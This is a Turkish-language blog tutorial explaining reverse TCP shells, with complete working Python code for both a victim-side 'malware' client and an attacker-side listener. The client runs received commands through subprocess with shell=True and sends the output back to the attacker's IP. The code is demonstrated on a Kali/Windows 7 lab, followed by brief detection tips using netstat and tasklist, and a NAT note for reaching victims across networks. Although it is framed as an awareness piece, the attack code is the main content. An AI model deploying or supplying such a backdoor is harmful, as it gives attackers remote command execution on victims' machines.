Güvenlik

Python Reverse TCP Shell

Bu yazımda sizlere python ile reverse TCP shell yönteminden ve bir malware’in sisteme bulaştığı zaman  saldırgana nasıl backdoor (arka kapı) açtığından bahsedip, kod bloğumuz içinde yer alacak  satırlarları açıklayacağım. Yazımızın sonunda ise farkındalık oluşturmak adına birkaç linux ve windows komutundan bahsedeceğim.

 

Günümüzde  gerek network katmanında gerekse host veya server katmanında dışarıdan gelebilecek bağlantılar için firewall’larda port kısıtlamaları son derece önem gösterilerek yapılmaktadır. Server üzerinde istenilmeyen servislerin aktif edilmeyerek socket açmaması, son kullanıcı bilgisayarlarına dışarıdan gelen tüm bağlantıların kapatılması, alınan önlemlerden bir kısmı diyebiliriz. Bunca güvenlik önlemi alınırken saldırganlarda boş durmadı ve biz sisteme sızamıyorsak onlar bizim ayağımıza gelsin” yöntemini geliştirdiler. Peki bu nasıl oluyor ? Bunun birçok yöntemi var, server sistemlerde kullanılan uygulamanın zaafiyeti olmasından kaynaklanan bir açıktan tutun bir malware’in sisteme bulaşmasına ve bu zararlı yazılımın saldırgana backdoor ile bağlanmasını sağlamaya kadar gidiyor.

 

clip_image001

 

Ve Saldırgan Socket Açarak Bekleyise Gecer

 

Nedir bu socket ?;  Network üzerinde çalışmasını istediğiniz bir uygulama veya servis olduğu zaman ethernet kartınızın ip adresi ile uygulamanın çalışması için verilen port bilgisi birleşir (socket ) ve bu ikili uygulamanıza gelecek istekleri karşılamak için dışarıya bağlantı açar. İnternet üzerinden bağlandığınız web sitelerini buna örnek gösterebiliriz. Browser’ınıza bir site adresi yazdığınızda www.cozumpark.com:80” diye çalışır. Siz her ne kadar 80” portunu görmesenizde(80 haricinde görürsünüz) çözümpark server’larına bu istek,  “ip:port” isteği olarak gider ve çözümpark server üzerinde çalışan IIS veya Apache socket’in karşılığı olan uygulamayı kullanıcıya döndürür (Server tarafında bu socket açıksa).

 

Görüldüğü üzere server-client mimarisi bir uygulama yazıyorsanız, python’da socket kütüphanesini kullanıyorsunuz. oluşturduğumuz fonksiyonu açıklarsak;

 

Socket=socket.socket()  ile  yeni bir socket oluşturduk

 

socket.AF_INET ile çağırarak IPv4  model bir socket olacağın

belirttik.

 

socket.SOCK_STREAM ile TCP temelli bir haberleşme olacağını belirttik(SOCK_DGRAM udp için)

 

Socket.bind((ip,port)) hatırlarsanız socket tanımını yaparken hep, ip:port ikilisi diye bahsetmiştik. İşte burada da oluşturduğumuz Socket’e ip:port bilgisini atadık ve çalıştığı makinada(saldırgan makina) interface’in IP ve hangi port adresini dinleyeceğini söyledik.”0.0.0.0″ yaparsanız üzerindeki tüm ip almış interface’leri dinler.

 

Socket.listen(1)  Aynı anda kaç bağlantıyı dinleyeceğini belirttik.

 

socketaddr,ipaddrr=Socket.accept()  oluşturduğumuz socket’e gelecek bağlantıları kabul etmek için accept()’i çağardık ve client tarafından açtığımız socket’e bağlantı geldiği  zaman size iki liste elemanı döndürür, karşı tarafla oluşan socket objesini ve bağlanan makinanın ipaddressi:port bilgisi

 

while döngüsünde, bağlantı oluştuğu zaman, raw_input() ile saldırgandan komut girmesini bekliyoruz. Girilen bu komutda “cikis” adli bir kelime geçiyorsa socket’i kapatmasını socketaddr.close()  yani bağlantıyı sonlandırmasını, geçmiyorsa da girilen komutu, oluşan  bağlantı socket’inde  socketaddr.send(komut) yardımı ile karşı tarafa göndermesini(malware yüklü makina).

 

print socketaddr.recv(1024) TCP bir bağlantı olduğu için gönderdiğimiz komuta karşılık gelen paketi’in 1 Mb lık değerini ekrana yazıyoruz.

 

baglanti() komutu ilede fonksiyonumuzu çağarıyoruz yani çalıştırıyoruz.

 

Gelelim şimdi malware yüklü veya client tarafına.

 

import socket

import subprocess

 

port=6161

ip=”192.168.0.34″

def baglanti():

    Socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    Socket.connect((ip,port))

 

    while True:

        komut = Socket.recv(1024)

 

        if ‘cikis’ in komut:

            Socket.close()

            break

        else:

            CMD=subprocess.Popen(komut, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)

            Socket.send(CMD.stdout.read())

            Socket.send(CMD.stderr.read())

           

           

 

baglanti()

 

Bir önceki komut dizinimizde detaylı olarak python’da socket oluşturmayı gösterdiğim için burada fazla detaya girmiyorum.

 

subprocess modülü alt işlemler oluşturmanıza (bir işlem çalışıyorken aynı anda başka bir işlemi alt işlem olarak çalıştırmanıza) ve bu işlemin sonucunda  dönen girdi/çıktı/hata  değerlerini yöneterek PIPE ile bağlamanızı sağlar.

 

Socket.connect((ip,port)) ile saldırgan makinamıza bağlanma talebi yolladık,

 

komut=Socket.recv(1024) bir önceki komut dizinimizde saldırganın raw_input ile gönderdiği komutu, komut adlı değişkenimize atıyoruz ve komut içinde cikis yazıyorsa(saldırgan bu komutu yollamıssa) socket’i sonlandırıyoruz(sürekli açık kalıp, bir sonraki aşamada socket kullanılıyor demesin diye).

 

 

CMD.subprocess.Popen(komut, shell= True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

kullanmamızın nedeni bir üst işlem ile aynı anda çalışacağını belirttik ve (komut) adlı değişkenimizi argüman olarak çağarıp, shell=True diyerek shell’i çağardık ve argümanımızı buraya yazdık. Normalde shell değerini injection ataklara karşı false yapmamızı önerirler ama bizim işimiz zaten bu 🙂

 

bir alt satırda yazan socket.send(CMD.stdout.read()) ve socket.send(CMD.stderr.read())  subprocess işleminde dönen çıktıyı ve hatayı okuyarak socket’e yani saldırgana yolluyoruz. Böylece saldırgan raw_input ile bir komut yolladığında, malware yüklü client makinamız bu komutu alıyor, subprocess ile shell’e yazıyor, dönen cevabı saldırgana açılan socket üzerinden yolluyor.

 

clip_image002

 

import socket #Socket oluşturmak için kullandığımız modül

 

port=6161 #Saldırganın dinleyeceği port adresi

ip=”192.168.0.34″ #Saldırgan’ın dış dünya ile bağlantısını sağlayan IP adresi

def baglanti():

    Socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    Socket.bind((ip,port))

    Socket.listen(1)

 

    socketaddr,ipaddr= Socket.accept()

    print ‘Baglanti gerceklesti’,ipaddr

 

    while True:

        komut= raw_input(“Shell> “)

        if ‘cikis’ in komut:

            socketaddr.send(‘cikis’)

            socketaddr.close()

            break

        else:

            socketaddr.send(komut)

            print socketaddr.recv(1024)

baglanti()

 

Evet Gelelim bir ekran görüntüsü ile bu yazdığımızı açıklamaya. Benim test ortamımda(VirtualBox) Windows 7 (Malware yüklü client), bir de Kali linux yüklü saldırgan dediğim makinam var.

 

Şimdi tek yapmamız gereken Saldırgan makinada SocketServer.py scriptimizi çalıştıralım ve client tarafından malware’in çalışıtırıldığı zamanki durumu görelim.

 

clip_image003

 

Gördüğünüz gibi kurban makinamız malware’i çalıştırdı ve saldırgan makina reverse TCP shell alarak, windows üzerinde bulunduğu dizinde neler olduğunu görmen için “dir” komutunu çalıştırdı. ” işlemlerini bitirdikten sonrada “cikis” komutu ile socket’i kapattı. Tabi bu yaptığım örnek sadece reverse TCP shell nedir ? sorusuna cevap niteliğinde basit client-server uygulamasıydı.  Günümüzde birçok malware analiz edildiği zaman “7777” portunu kullandığınıda dip not olarak eklemek isterim. Gelir bir de analiz aşamasında client makinada neler oluyor çok ufak ona bakalım.

 

netstat -naob (Admin yetkisi ile )komutunu çalıştırarak TCP veya UDP üzerinden bağlantı kurmuş makinaları görebilirsiniz. “o” parametresi size işlem id’yi, ” b ” parametresi ile o işlem id’ye karşılık gelen  ugulama adını gösterir.

 

clip_image005

 

 

Gördüğünüz gibi client makinamız saldırgan ip adresine “6161 ” bağlantı kurmuş. Tabi bu sizin için anormal bir trafik olduğunu düşündürüp, birde bu uygulamanın hangi serisleri çalıştırdığına bakmanız ihtiyacını doğuruyor.

 

tasklist /svc ilede çalışan uygulamalara atanan servislerin listesini gösterir.

 

clip_image007

 

 

Malware kendini hiçbir servise bind etmemiş, tabi bizimki masum bir malware olduğu için bu böyle. Normalde siz bu işlem id’sini gördüğünüzde o işlemi sonlandıracağını tahmin ettiği için kendini başka bir servise bind eder ve daha detaylı bir analiz yapmanızı gerektirir.

Not: Bu işlem için saldırgan makinanız ile client aynı network’de değilse, saldırgan uygulamanız için modem veya firewall’dan NAT tanımlaması yapmanız gerekir

Evet arkadaşlar basit anlamda bu yazımızda Reverse TCP shell’i anlatmaya çalıştım. Umarım amaca hizmet edebilmişimdir. Bir sonraki yazımda yine python ile ilgili farklı bir konuyu ele alacağım.

 

Teşekkürler

 

İlgili Makaleler

Bir cevap yazın

E-posta hesabınız yayımlanmayacak.

Başa dön tuşu

Reklam Engelleyici Algılandı

ÇözümPark Bilişim Portalı gönüllü bir organizasyon olup tek gelir kaynağı reklamlardır. Bu nedenle siteyi gezerken lütfen reklam engelleme eklentinizi kapatın veya Çözümpark web sitesi için izin tanımı yapın. Anlayışınız için teşekkürler.